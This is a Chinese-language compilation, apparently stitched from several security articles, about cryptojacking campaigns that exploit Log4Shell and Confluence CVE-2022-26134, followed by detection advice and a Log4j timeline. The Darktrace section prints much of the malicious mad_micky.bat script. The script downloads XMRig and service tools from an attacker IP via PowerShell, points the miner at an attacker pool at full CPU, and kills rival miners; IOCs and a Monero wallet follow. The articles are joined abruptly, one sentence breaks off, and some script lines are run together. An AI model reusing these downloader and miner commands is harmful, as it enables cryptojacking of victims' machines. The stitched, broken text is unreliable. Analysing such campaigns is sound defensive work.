阿里巴巴云安全团队公开披露了一个严重漏洞 (CVE-2021-44228),该漏洞可在多个版本的 Apache Log4j2 (Log4Shell) 上实现未经身份验证的远程代码执行。攻击者可通过任何协议(如 HTTPS)连接易受攻击的服务器,并发送特制字符串进行利用。
Darktrace 在多个客户部署环境中检测到因利用此 Log4j 漏洞而发生的加密货币挖矿行为。在这些事件中,漏洞利用均通过出站 SSL 连接进行,这些连接看起来是请求 base64 编码的 PowerShell 脚本,以绕过边界防御并下载批处理(.bat)脚本文件以及多个可安装加密货币挖矿恶意软件的可执行文件。该活动具有更广泛的攻击活动指标,包括常见的硬编码 IP、可执行文件和脚本。
攻击周期始于对联网设备的机会性扫描,以寻找存在 Log4j 漏洞的 VMWare Horizons 服务器。一旦发现易受攻击的服务器,攻击者就会向受害者发起 HTTP 和 SSL 连接。成功利用漏洞后,服务器会在端口 1389 上执行回调,并检索名为 mad_micky.bat 的脚本。该脚本可实现以下目的:
在至少两个案例中,mad_micky.bat 脚本是通过 HTTP 连接检索到的,该连接的用户代理为 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS)。这是这些网络上第一次也是唯一一次出现该用户代理。这个用户代理似乎被一些出厂全新安装的 ASUS 设备合法使用;然而,作为一个仅在此次活动中出现的新用户代理,它十分可疑。
成功利用漏洞后,服务器会在端口 1389 上执行回调以检索脚本文件。在此示例中,/xms.ps1 是一个 base64 编码的 PowerShell 脚本,它绕过主机上的执行策略以调用 ‘mad_micky.bat’:
图 1:有关 PowerShell 脚本 xms.ps1 的补充信息
该快照详细记录了受影响服务器的事件日志,并表明成功的 Log4j RCE 导致了 mad_micky.bat 文件的下载:
图 2:突出显示 mad_micky.bat 文件的日志数据
随后发起了其他连接以检索可执行文件和脚本。这些脚本中包含位于韩国和乌克兰的两个 IP 地址。攻击者连接了乌克兰的 IP 以下载可执行文件 xm.exe,该文件会激活矿工程序。此处的矿工程序 XMRig Miner 是一个开源、跨平台的挖矿工具,可从多个公共位置下载。观察到的下一个 exe 下载是 ‘wxm.exe’(f0cf1d3d9ed23166ff6c1f3deece19b4)。
图 3:有关 XMRig 可执行文件的补充信息
与韩国 IP 的连接涉及对另一个脚本(/2.ps1)以及一个可执行文件(LogBack.exe)的请求。该脚本会删除与日志记录相关的正在运行的任务,包括 SCM 事件日志筛选器或 PowerShell 事件日志使用者。该脚本还会从 Pastebin 请求一个文件,该文件可能是一个 Cobalt Strike 信标配置文件。日志删除通过计划任务和 WMI 执行,包括:Eventlogger、SCM Event Log Filter、DSM Event Log Consumer、PowerShell Event Log Consumer、Windows Events Consumer、BVTConsumer。
从 Pastebin 请求的第二个文件(尽管 Pastebin 已不再托管)是 schtasks 命令的一部分,因此可能用于建立持久性:
可执行文件 Logback.exe 是另一个 XMRig 挖矿工具。同一个韩国 IP 还下载了一个 config.json 文件。之后使用 cmd.exe 和 wmic 命令对矿工程序进行配置。
这些文件下载和矿工程序配置之后,又出现了与 Pastebin 的额外连接。
图 4:mad_micky.bat 文件的 OSINT 关联
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0echo [*] Downloading MoneroOcean advanced version of XMRig to “%USERPROFILE%\xmrig.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘http://141.85.161[.]18/xmrig.zip’, ;%USERPROFILE%\xmrig.zip’)”
echo copying to mimu directory
if errorlevel 1 (
echo ERROR: Can’t download MoneroOcean advanced version of xmrig
goto MINER_BAD)echo [*] Unpacking “%USERPROFILE%\xmrig.zip” to “%USERPROFILE%\mimu6”
powershell -Command “Add-type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(‘%USERPROFILE%\xmrig.zip’, ‘%USERPROFILE%\mimu6’)”
if errorlevel 1 (
echo [*] Downloading 7za.exe to “%USERPROFILE%za.exe”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.Downloadfile(‘http://141.85.161[.]18/7za.txt’, ‘%USERPROFILE%za.exe’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”url\”: *\”.*\”,’, ‘\”url\”: \”207.38.87[.]6:3333\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”user\”: *\”.*\”,’, ‘\”user\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”pass\”: *\”.*\”,’, ‘\”pass\”: \”%PASS%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”max-cpu-usage\”: *\d*,’, ‘\”max-cpu-usage\”: 100,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
set LOGFILE2=%LOGFILE:\=\\%
powershell -Command “$out = cat ‘%USERPROFILE%\mimu6\config.json’ | %%{$_ -replace ‘\”log-file\”: *null,’, ‘\”log-file\”: \”%LOGFILE2%\”,’} | Out-String; $out | Out-File -Encoding ASCII ‘%USERPROFILE%\mimu6\config.json’”
if %ADMIN% == 1 goto ADMIN_MINER_SETUP
if exist “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
if exist “%USERPROFILE%\Start Menu\Programs\Startup” (
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”
goto STARTUP_DIR_OK
)
echo [*] Downloading tools to make gado_miner service to “%USERPROFILE%\nssm.zip”
powershell -Command “$wc = New-Object System.Net.WebClient; $wc.DownloadFile(‘[http://141.85.161[.]18/nssm.zip’, ‘%USERPROFILE%\nssm.zip’)”
if errorlevel 1 (
echo ERROR: Can’t download tools to make gado_miner service
exit /b 1Darktrace 用于识别此攻击活动的关键模型违规包括以失陷为重点的模型:Application Protocol on Uncommon Port、Outgoing Connection to Rare From Server 和 Beaconing to Rare Destination。以文件为重点的模型包括 Masqueraded File Transfer、Multiple Executable Files and Scripts from Rare Locations 和 Compressed Content from Rare External Location。加密货币挖矿通过 Cryptocurrency Mining Activity 模型进行检测。
与 Unusual PowerShell to Rare and New User Agent 相关的模型突出显示了 Log4j 回调后受感染设备上的异常连接。
使用 Darktrace 的 Autonomous Response 技术 Antigena 的客户还可以采取行动,阻止下载的传入文件和脚本,并将受感染设备限制为正常行为模式,从而同时防止最初的恶意文件下载和持续的加密货币挖矿活动。
5 月 31 日,一个影响所有受支持的 Confluence Server 和 Data Center 版本的严重未修补漏洞由安全公司 Volexity 报告给了 Atlassian。
Atlassian 于 6 月 2 日警告其客户存在该严重漏洞,并于一天后发布了补丁。CISA 于 6 月 3 日将此漏洞添加到其已知被利用漏洞列表中。
Check Point 发布了专门的防护措施,以防止利用此漏洞的攻击,并建议客户修补受影响的系统。
漏洞
Atlassian Confluence 和 Data Center 中的该漏洞被指定为 CVE-2022-26134,可能导致未经身份验证的对象图导航语言(OGNL)表达式注入攻击。
远程、未经身份验证的攻击者可以通过在 URI 中放置恶意负载,利用此漏洞在目标服务器上执行任意代码。

图 1:利用 CVE-2022-26134 的恶意负载。
野外利用
Check Point Research(CPR)的研究人员注意到,自该漏洞发布以来,出现了大量的利用尝试。起初,许多潜在攻击者使用扫描方法来识别易受攻击的目标。几天后,攻击者开始利用该漏洞向受影响系统下载恶意软件。
在利用日志中,研究人员注意到一些恶意负载与同一攻击活动相关,它们源自同一来源,但针对不同的平台:Linux 和 Windows。
感染链取决于受害者的操作系统。
针对 Linux 操作系统的攻击
攻击者通过向受害者发送精心构造的 HTTP 请求来利用 Atlassian 0-day 漏洞。

图 2:利用 CVE-2022-26134 并带有 base64 编码负载的精心构造的 HTTP 请求。
该 base64 字符串解码后得到另一个 base64 编码的字符串。总体而言,研究人员必须对该字符串解码数次才能获得实际的负载。

图 3:解码后的 base64 字符串。
该脚本从远程 C&C 服务器下载一个名为 xms 的 bash 脚本文件到受害者的 tmp 文件夹,执行它,然后将其删除。

图 4:恶意 xms 脚本的一部分。
该 xms 文件是一个投放器脚本。它会卸载受害者机器上正在运行的代理,并将自身添加到 cron 任务中,以便在重启后保持持久化。
此外,它会持续对 a[.]oracleservice.top 执行网络连通性测试。
为了传播到其他机器,该脚本会搜索 ssh 密钥并尝试连接。然后从 C&C 服务器下载 xms 文件并执行。
该脚本会将一个名为 dbused 的 elf 可执行文件下载到各远程 IP 的 tmp 文件夹中。
该 dbused 文件使用 upx 打包,以规避静态检测。
该 elf 文件是一个加密货币挖矿程序,会耗尽受害者机器的资源:

图 5:dbused 进程耗尽系统资源。
针对 Windows 操作系统的定向攻击
攻击者利用 Atlassian 漏洞执行 PowerShell 下载启动器,从远程 C&C 服务器发起无文件攻击。

图 6:使用 PowerShell 命令利用 CVE-2022-26134 的恶意构造 HTTP 请求。
该 lol.ps1 脚本被注入到 PowerShell 内存进程中。
该脚本使用 wmi 验证处理器架构,以检查其是否符合要求。
然后,它将一个名为 checkit2 的可执行文件下载到 tmp 文件夹,并以隐藏模式运行它。

图 7:lol.ps1 脚本。
checkit2.exe 进程会生成一个子进程,名为 InstallUtil.exe,该进程连接到 C&C 服务器。 InstallUtil.exe 随后又会生成另一个子进程 AddInProcess.exe,即加密货币挖矿程序。在受害者机器上运行片刻后, checkit2 进程会自我终止。
![]()
图 8:在系统上运行的 checkit2.exe 进程。
![]()
图 9:在系统上运行的 InstallUtil.exe 进程。
该恶意软件会以一个新名称将自身的副本下载到“开始”菜单文件夹中。

图 10:下载到启动文件夹的 cloud.exe 文件。
加密货币挖矿程序现在在机器上运行,并耗尽系统所有资源:
![]()
图 11:加密货币钱包信息。
攻击链
两种攻击场景都始于利用 CVE-2022-26134 漏洞的初始恶意构造 HTTP 请求。攻击者使用 Java 执行功能执行命令,将恶意负载下载到受害者机器上。
恶意负载随后会根据受影响的操作系统下载相应的可执行文件。这两个可执行文件都会运行加密货币挖矿程序,利用受害者资源为自己牟利。
威胁行为者
a[.]oracleservice.top 域名以及我们从系统中提取的加密货币钱包,与一个名为“8220 团伙”的网络犯罪组织有关。
Check Point 防护:
IPS:
Atlassian Confluence 远程代码执行(CVE-2022-26134)
Anti-Bot:
Trojan.WIN32.XMRig
IOCs:
198.251.86[.]46
51.79.175[.]139
167.114.114[.]169
146.59.198[.]38
51.255.171[.]23
a.oracleservice[.]top
d2bae17920768883ff8ac9a8516f9708967f6c6afe2aa6da0241abf8da32456e
2622f6651e6eb01fc282565ccbd72caba9844d941b9d1c6e6046f68fc873d5e0
4e48080f37debd76af54a3231ecaf3aa254a008fae1253cdccfcc36640f955d9
4b8be1d23644f8cd5ea22fa4f70ee7213d56e3d73cbe1d0cc3c8e5dfafe753e0
门罗币钱包:
46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ
加密货币劫持是指未经授权使用他人的计算资源来挖掘加密货币。黑客试图劫持他们能够控制的任何系统——台式机、服务器、云基础设施等——以非法挖掘加密货币。
无论采用何种传递机制,加密货币劫持代码通常都会在后台悄悄运行,而毫不知情的受害者仍在正常使用其系统。他们可能注意到的唯一迹象是性能变慢、执行延迟、过热、功耗过高或云计算账单异常升高。
代币挖掘是加密货币世界中的一种合法流程,它使新的加密货币进入流通。该过程通过奖励第一个解决复杂计算问题的矿工来实现。该问题完成验证交易的区块,这些区块将被添加到加密货币区块链中。
“矿工实际上是在作为审计员获得报酬。他们正在核实比特币交易的合法性,”Investopedia 最近的一篇关于比特币挖矿原理的解读文章详细阐述了这一点。“除了让矿工获利和支持比特币生态系统之外,挖矿还有另一个至关重要的目的:它是让新加密货币进入流通的唯一途径。”
通过代币挖掘赚取加密货币通常需要消耗大量的处理能力和能源。此外,加密货币生态系统的设计方式使得挖矿难度不断增加,并且随着时间推移和挖矿竞争加剧,奖励也会减少。这使得合法的加密货币代币挖掘成为一项极其昂贵的事情,成本持续上升。
攻击方式仅受加密货币劫持者创造力的限制,但以下是一些目前最常见的攻击方式。
过去,加密货币劫持主要是终端恶意软件的手段,是在台式机和笔记本电脑上投放恶意软件的又一盈利目标。传统的加密货币劫持恶意软件通过典型途径传播,如无文件恶意软件、钓鱼计划,以及网站和 Web 应用中的嵌入式恶意脚本。
加密货币劫持攻击者窃取资源最基本的方式是向终端用户发送看似合法的电子邮件,诱骗他们点击一个链接,该链接会运行代码,在他们的计算机上植入加密挖矿脚本。该脚本在后台运行,并通过命令与控制(C2)基础设施将结果发送回来。
另一种方法是在网站或投放到多个网站的广告中注入脚本。一旦受害者访问该网站,或受感染的广告在其浏览器中弹出,脚本就会自动执行。受害者的计算机上不会存储任何代码。
这些途径仍然是一个现实存在的担忧,不过犯罪分子为了扩大利润,已在他们的加密货币劫持战术中加入更加复杂的技术,其中一些不断演变的方法将在下面介绍。
攻击者试图通过将视野扩展到服务器、网络设备甚至 IoT 设备来提高加密货币劫持的盈利能力。例如,服务器是一个特别诱人的目标,因为它们通常比普通台式机拥有更高的性能。2022 年,它们也是一个主要的猎场,因为坏人会扫描暴露在公共互联网上且存在 Log4J 等漏洞的服务器,利用该漏洞并悄悄地在与黑客服务器连接的系统中加载加密挖矿软件。攻击者通常会利用最初受损的系统,将加密货币劫持横向移动到其他网络设备。
“我们看到由 Log4J 漏洞引发的加密挖矿活动有所增加,”LogRhythm 的高级威胁研究工程师 Sally Vincent 表示。“黑客正在入侵网络并安装利用存储来挖掘加密资产的恶意软件。”
网络犯罪分子正通过 向开源代码仓库注入 包含嵌入加密货币劫持脚本的恶意软件包和库来攻击软件供应链。由于全球开发者数以百万计地下载这些软件包,这些攻击可以通过两种方式迅速扩大攻击者的加密货币劫持基础设施。恶意软件包可用于针对开发者系统及其连接的网络和云资源,将其直接用作非法加密挖矿资源;或者利用这些攻击来污染开发者正在构建的软件,使其包含在应用程序最终用户机器上执行加密挖矿脚本的组件。
许多加密货币劫持团伙正利用云资源的可扩展性,通过入侵云基础设施,接入更大范围的计算资源池来为其挖矿活动提供算力。谷歌网络安全行动团队(Google’s Cybersecurity Action Team)去年秋天的一项 研究 报告称,86% 被入侵的云实例被用于加密挖矿。
“如今,攻击者正想方设法地利用云服务来挖掘越来越多的加密货币,因为云服务能让他们以远超单台本地机器的规模运行计算,无论是接管用户托管的云环境,还是滥用 SaaS 应用程序来执行计算,”Palo Alto Networks 高级安全研究员 Guy Arazi 在一篇 博文中写道。
一种常见的方法是扫描暴露的容器 API 或不安全的云存储桶,并利用该访问权限开始在受影响的容器实例或云服务器上加载挖矿软件。此类攻击通常通过扫描软件自动化进行,该软件会寻找可通过公共互联网访问、暴露 API 或允许未授权访问的服务器。攻击者通常使用脚本将挖矿负载投放到初始系统,并寻找在相连云系统间传播的方法。
“大规模实施加密货币劫持的盈利性和简便性使这类攻击成为‘低垂的果实’,”Cado Security 安全研究员 Matt Muir 在一篇 博文中表示,并解释基于云端的攻击尤其有利可图。“只要用户继续将 Docker 和 Redis 等服务暴露给不受信任的网络,这种情况很可能就会持续下去。”
根据 ReasonLabs 的一份 报告,在过去一年检测到的所有木马中,58.4% 是加密货币劫持挖矿程序。与此同时,SonicWall 的另一项研究发现,2021 年是迄今为止加密货币劫持攻击最严重的一年,全年记录了 9710 万次此类攻击。这些数字之所以如此之高,是因为加密货币劫持实际上是在为网络犯罪分子印钞。
当一个犯罪分子可以在看似无限的受害者机器免费计算资源池上挖掘加密货币时,他们的收益将是巨大的。即使今年春天比特币估值急剧下跌,跌破 30,000 美元大关,加密货币劫持者的非法利润仍然在商业上说得通,因为他们挖到的价值远超其犯罪基础设施的成本。
Cado Labs 安全研究团队的蜜罐 发现了一种多阶段加密货币劫持攻击,它针对暴露的 Docker Engine API 端点和 Redis 服务器,并且能够以类似蠕虫的方式传播。该攻击由 WatchDog 攻击组织实施,该组织在 2021 年底和 2022 年期间特别活跃,发起了大量加密货币劫持活动。
TeamTNT 是最早将加密货币劫持重点大幅转向云服务导向的黑客组织之一。TrendMicro 的研究人员在 2021 年底 报告,该组织以及 Kinsig 团伙等竞争对手正在开展加密货币劫持活动,在阿里云弹性计算服务(ECS)实例中安装挖矿程序,并禁用安全功能以逃避检测。
Log4Shell 漏洞在 2022 年成为加密货币劫持攻击者的福音。一个显著的例子是,Sophos 研究人员今年早些时候 发现,“一大群”攻击者正在针对 VMware Horizon 服务器,投放一系列加密货币劫持负载,包括 z0Miner、JavaX 矿工,以及至少两个 XMRig 变体——Jin 和 Mimu 加密货币挖矿机器人。
2021 年秋季,Sonatype 的软件供应链安全专家对隐藏在 npm 中的恶意加密挖矿包发出警报。npm 是全球开发者使用的 JavaScript 软件包仓库。当时,它发现了一组三个软件包,其中至少有一个冒充开发者使用的流行合法库“ua-parser-js”,该库每周下载量超过 700 万次,是诱骗开发者无意中下载恶意代码并将其安装到其软件中的理想途径。
该报告发布几个月后,研究人员 WhiteSource(现为 Mend)发布了另一份 报告,显示 npm 中充斥着恶意代码——多达 1,300 个恶意软件包,其中包含加密货币劫持和其他恶意行为。
去年夏天,Bitdefender 发现 了一个以SSH凭证攻击基于Linux的机器、以部署门罗币(Monero)挖矿恶意软件的罗马尼亚威胁组织。他们使用的工具以服务化(as-a-service)模式分发。这个例子正处于一个日益增长的趋势的最前沿——针对Linux系统的加密货币挖矿攻击。VMware在今年早些时候发布的一份 报告 中详细描述了针对基于Linux的多云环境的攻击日益增多,尤其是使用XMRig挖矿软件的攻击。
“来自基于Linux系统的许多加密货币挖矿样本都与XMRig应用程序存在某种关系,”报告解释道,该报告显示89%的加密货币挖矿攻击使用了与XMRig相关的库。“因此,当在Linux二进制文件中识别出XMRig特有的库和模块时,很可能表明存在潜在的加密货币挖矿行为。
CoinStop是最近发现的另一个针对亚洲云服务提供商(CSP)的加密劫持活动。该活动的特别之处在于其反取证和规避措施。这些措施包括时间戳篡改(timestomping)以操纵系统时间戳、删除系统加密策略,以及使用/dev/tcp设备文件创建反向shell会话,Cado的Muir在一份 报告 中对该攻击进行了说明。
加密劫持者有时会不遗余力地窃取企业基础设施的处理能力,甚至能源和网络资源。去年,Darktrace分析师 强调 了一个来自其客户的匿名案例,在该案例中,他们在一个仓库中发现了一个加密货币矿场,伪装在一堆不起眼的纸板箱中。箱子里面是一台隐蔽的挖矿设备,运行着多块GPU,接入公司的网络电源,
随着加密劫持演变为跨越端点、服务器和云资源的多向量攻击,预防加密劫持需要一套协调且全面的防御策略。以下步骤有助于防止加密劫持在企业资源上肆虐。
采用强大的端点防护: 其基础是使用能够检测加密货币矿工的端点防护和反恶意软件,同时保持Web过滤器更新并管理浏览器扩展,以最大限度地降低基于浏览器的脚本执行风险。组织最好寻找能够扩展到服务器及更远范围的端点防护平台。
为服务器(以及所有其他设备)打补丁并加固。 加密劫持者往往会寻找能够悄悄收割的最低垂的果实——包括扫描暴露在公网上、带有较旧漏洞的服务器。基本的服务器加固,包括打补丁、关闭未使用的服务以及限制外部暴露面,可以大大降低基于服务器的攻击风险。
使用软件成分分析。 软件成分分析(SCA) 工具能够更好地了解软件中使用了哪些组件,从而防止利用挖矿脚本的供应链攻击。
排查云配置错误。 组织阻止云中加密劫持的最有效方法之一是收紧云和容器配置。这意味着要发现未经适当身份验证就暴露在公共互联网上的云服务,找出暴露的API服务器,并消除存储在开发人员环境中以及硬编码到应用程序中的凭证和其他机密。
加密劫持是一种典型的低慢型网络攻击,旨在留下最少的痕迹以避免长期检测。虽然端点防护平台和端点检测与响应技术在针对加密劫持攻击发出告警方面取得了长足进步,但攻击者在这方面是规避大师,检测非法加密货币矿工仍然可能很困难,尤其是在只有少数系统被入侵的情况下。以下是一些用于标记加密劫持迹象的额外方法。
培训你的服务台人员识别加密货币挖矿的迹象。 有时用户端点上的第一个迹象是服务台关于计算机性能缓慢的投诉激增。这应该引起警觉,促使进一步调查;设备过热或移动设备电池性能不佳也可能是迹象。
部署网络监控解决方案。 网络监控工具可以成为强大的工具,能够捕捉到表明加密劫持活动的各类Web流量和出站C2流量,无论流量来自何种设备。
“如果你在服务器上配置了良好的出口过滤,监控出站连接发起,那么这对[挖矿恶意软件]来说就是一种良好的检测手段,”Archaea Energy副总裁兼首席信息安全官(CISO)Travis Farral说。不过,他警告说,加密货币矿工的作者可以编写恶意软件来规避这种检测方法。
使用云监控和容器运行时安全。 不断发展的工具,如云监控和容器运行时安全扫描,可以为可能受到未经授权的加密货币矿工影响的云环境提供额外的可见性。云提供商正在将其纳入其服务中,有时作为附加组件。例如,Google Cloud今年早些时候扩展了其Security Command Center,加入了其所谓的虚拟机威胁检测(VMTD),以捕捉云中的加密货币挖矿迹象以及其他云威胁。
定期进行威胁狩猎。 由于许多加密劫持攻击都是隐蔽的,几乎不留下痕迹,组织可能需要采取更主动的措施,如威胁狩猎,定期寻找细微的入侵迹象并跟进调查。
“端点安全和SOC团队应该投入时间进行主动演练和威胁狩猎,而不是坐等潜在的灾难性事件发生,”LogRhythm的Vincent说。
监控你的网站是否有加密货币挖矿代码。 Farral警告说,加密劫持者正在寻找方法将JavaScript代码片段放置在Web服务器上。“服务器本身不是目标,但任何访问该网站的人[都面临感染风险],”他说。他建议定期监控Web服务器上的文件更改或页面本身的更改。
在检测到非法加密货币挖矿活动后,应对加密劫持攻击应遵循标准的网络事件响应步骤,包括遏制、根除、恢复和经验教训。应对加密劫持攻击的一些技巧包括:
终止Web投递的脚本。 对于浏览器内JavaScript攻击,一旦检测到加密货币挖矿,解决方案很简单:终止运行该脚本的浏览器标签页。IT部门应记录作为脚本来源的网站URL,并更新公司的Web过滤器以将其阻止。
关闭受感染的容器实例。 不可变的云基础设施(如感染了矿工的容器实例)也可以简单处理:关闭受感染的容器实例并重新开始。然而,组织必须深入调查最初导致容器受损的根本原因。这意味着要寻找容器仪表板和凭证已被入侵的迹象,并检查连接的云资源是否有受损迹象。一个关键步骤是确保替换旧镜像的全新容器镜像没有被类似地配置。
减少权限并重新生成API密钥。 根除并完全恢复基于云的加密劫持将要求组织减少受影响云资源(以及与之连接的资源)的权限,并重新生成API密钥,以防止攻击者直接回到同一云环境。
学习并适应。 利用这次经验更好地了解攻击者是如何入侵你的系统的。更新你的用户、服务台、IT和SOC分析师培训,使他们能够更好地识别加密劫持企图并做出相应响应。
编者注:本文最初发表于2018年2月,已更新以纳入新的研究、最佳实践和加密劫持示例。
Apache Log4j漏洞 自12月初被发现以来一直占据全球头条新闻。该漏洞影响了世界各地的大量组织,安全团队争相缓解相关风险。以下是围绕Log4j漏洞展开的关键事件时间线。
Apache发布了Log4j中一个严重漏洞的详细信息,Log4j是数百万基于Java的应用程序中使用的日志库。攻击者开始利用该漏洞(CVE-2021-44228)——被称为“Log4Shell”,在CVSS漏洞评级量表上被评为10分(满分10分)。它可能导致在运行易受攻击应用程序的底层服务器上执行远程代码(RCE)。“当启用消息查找替换时,能够控制日志消息或日志消息参数的攻击者可以执行从LDAP服务器加载的任意代码,”Apache开发人员在一份公告中写道。随着全球各地的安全团队努力保护其组织,Log4j 2.15.0的发布提供了该问题的修复。企业被敦促安装最新版本。
随着该漏洞的影响持续发酵,英国国家网络安全中心(NCSC)向英国公司发布了关于该漏洞的 公开警告 ,并概述了缓解策略。NCSC建议所有组织在已知使用Log4j的地方立即安装最新更新。“这应该是所有使用已知包含Log4j的软件的英国组织的首要任务。组织应同时更新面向互联网和不面向互联网的软件,”声明中写道。企业还被敦促查找未知的Log4j实例,并部署保护性网络监控/阻断。
与英国NCSC类似,美国网络安全和基础设施安全局(CISA)公开回应了Log4j漏洞,局长Jen Easterly反思了该漏洞给网络防御者带来的紧迫挑战。“CISA正在与我们的公共和私营部门合作伙伴密切合作,积极应对影响包含Log4j软件库的产品的严重漏洞,”她在 声明 中说。“我们正在采取紧急行动,推动缓解该漏洞并检测任何相关的威胁活动。我们已将该漏洞添加到我们的已知被利用漏洞目录中,这迫使联邦民事机构——并向非联邦合作伙伴发出信号——紧急修补或修复该漏洞。我们正在主动联系网络可能易受攻击的实体,并利用我们的扫描和入侵检测工具帮助政府和行业合作伙伴识别对漏洞的暴露或利用。”
CISA建议资产所有者采取三项额外的即时步骤来帮助缓解该漏洞:
发现了影响Apache Log4j的第二个漏洞。根据 CVE描述 ,新漏洞CVE 2021-45046允许恶意行为者使用JNDI查找模式构造恶意输入数据,以发起拒绝服务(DoS)攻击。新的 针对该漏洞利用的补丁 已发布,该补丁移除了对消息查找模式的支持,并默认禁用JNDI功能,而对原始漏洞的Log4j 2.15.0修复在某些非默认配置下并不完整。
“虽然CVE-2021-45046没有原始漏洞那么严重,但它成为威胁行为者对未修补或修补不当的系统进行恶意攻击的另一个载体,”Resilience的风险与响应主管Amy Chang在该漏洞被发现后不久告诉CSO。“对CVE-2021-44228的不完整补丁可能被滥用来构造恶意输入数据,从而导致DoS攻击。DoS攻击可以关闭机器或网络,使其对预期用户不可用,”她补充道。组织被建议尽快更新到Log4j 2.16.0。
Apache公布了第三个主要Log4j漏洞的详细信息,并提供了又一个修复。这是一个无限递归漏洞,评级为7.5分(满分10分)。“Log4j团队已获悉一个安全漏洞, CVE-2021-45105 ,该漏洞已在 Log4j 2.17.0 (适用于Java 8及更高版本)中得到解决,”它写道。“Apache Log4j2 2.0-alpha1至2.16.0版本未防止自引用查找导致的失控递归。当日志配置使用带有上下文查找的非默认Pattern Layout(例如$${ctx:loginId})时,控制线程上下文映射(MDC)输入数据的攻击者可以构造包含递归查找的恶意输入数据,导致StackOverflowError并终止进程。这也被称为DoS(拒绝服务)攻击。”
Apache还概述了以下缓解措施:
网络安全研究组织Cryptolaemus警告说, Log4j漏洞正被利用 来用Dridex银行木马感染Windows设备,并用Meterpreter感染Linux设备。Dridex是一种通过使用Microsoft Word宏的系统窃取银行凭证的恶意软件,而Meterpreter是一种Metasploit攻击有效载荷,提供交互式shell,攻击者可以从中探索目标机器并执行代码。Cryptolaemus成员Joseph Roosen告诉 BleepingComputer ,威胁行为者使用Log4j RMI(远程方法调用)漏洞利用变体,强制易受攻击的设备从攻击者控制的远程服务器加载并执行Java类。
网络安全供应商Tenable发布的数据显示,所有资产中有十分之一易受Log4Shell攻击,而30%的组织尚未开始扫描该漏洞。“在已评估的资产中,大约10%发现了Log4Shell,包括各种服务器、Web应用程序、容器和物联网设备,” Tenable博客文章 写道。“Log4Shell在所有行业和地区普遍存在。十分之一的企业服务器暴露在外。十分之一的Web应用程序,等等。我们数字基础设施的几乎每个方面都有十分之一可能通过Log4Shell受到恶意利用。”
该供应商警告说,由于Log4j在基础设施和应用程序中的普遍存在,Log4Shell比EternalBlue(在WannaCry攻击中被利用)具有更大的潜在威胁。“历史上没有任何一个漏洞如此明目张胆地要求修复。Log4Shell将重新定义我们所知的计算,将那些努力保护自己的人与那些甘于疏忽的人区分开来,”它补充道。
美国联邦贸易委员会(FTC)敦促美国组织立即修补Log4Shell漏洞,否则可能面临该机构的处罚。“当漏洞被发现并被利用时,可能会导致个人信息丢失或泄露、经济损失以及其他不可逆转的损害。采取合理措施缓解已知软件漏洞的义务涉及多项法律,其中包括《联邦贸易委员会法》和《格雷姆-里奇-比利雷法》,”FTC表示。它还补充说,依赖Log4j的公司及其供应商现在必须采取行动,以降低消费者受到伤害的可能性,并避免FTC采取法律行动。“FTC打算动用其全部法律权力,追究那些未能采取合理措施保护消费者数据免受Log4j或未来类似已知漏洞影响的公司的责任。”
